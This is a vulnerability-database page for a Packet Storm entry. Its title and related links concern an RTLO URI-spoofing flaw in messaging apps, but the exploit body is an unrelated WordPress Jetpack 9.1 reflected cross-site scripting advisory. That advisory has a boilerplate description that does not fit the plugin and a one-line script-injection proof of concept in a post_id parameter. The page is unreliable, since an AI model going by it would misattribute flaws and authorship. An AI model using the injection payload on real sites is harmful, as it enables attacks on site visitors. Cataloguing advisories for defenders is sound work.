Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormSick Codes, zadewgPACKETSTORM:166448
HistoryMar 25, 2022 - 12:00 a.m.

RTLO Injection URI Spoofing

2022-03-2500:00:00
Sick Codes, zadewg
packetstormsecurity.com
219
wordpress
jetpack
cross site scripting
plugin
exploit
security
uri spoofing

EPSS

0.002

Percentile

61.5%

JSON
`# Exploit Title: WordPress Plugin Jetpack 9.1 - Cross Site Scripting (XSS)  
# Date: 2022-02-07  
# Author: Milad karimi  
# Software Link: https://wordpress.org/plugins/jetpack  
# Version: 9.1  
# Tested on: Windows 11  
# CVE: N/A  
  
1. Description:  
This plugin creates a Jetpack from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.  
  
2. Proof of Concept:  
http://localhost/modules/contact-form/grunion-form-view.php?post_id=<script>alert("BY Ex3ptionaL")</script>  
  
`

Related

malwarebytes 1
nvd 4
cvelist 4
prion 4
cve 4
cnvd 1
malwarebytes
malwarebytes
URI spoofing flaw could phish WhatsApp, Signal, Instagram, and iMessage users
2022-03-31 15:40:38
nvd
nvd
CVE-2020-20094
2022-03-23 22:15:12
CVE-2020-20093
2022-03-23 22:15:12
CVE-2020-20096
2022-03-23 22:15:12
cvelist
cvelist
CVE-2020-20094
2022-03-23 21:27:46
CVE-2020-20093
2022-03-23 21:27:29
CVE-2020-20095
2022-03-23 21:28:33
prion
prion
Code injection
2022-03-23 22:15:00
Code injection
2022-03-23 22:15:00
Code injection
2022-03-23 22:15:00
cve
cve
CVE-2020-20094
2022-03-23 22:15:12
CVE-2020-20093
2022-03-23 22:15:12
CVE-2020-20096
2022-03-23 22:15:12
cnvd
cnvd
Facebook WhatsApp has an unspecified vulnerability
2022-03-28 00:00:00

EPSS

0.002

Percentile

61.5%

JSON
Related for PACKETSTORM:166448
malwarebytes1nvd4cvelist4prion4cve4cnvd1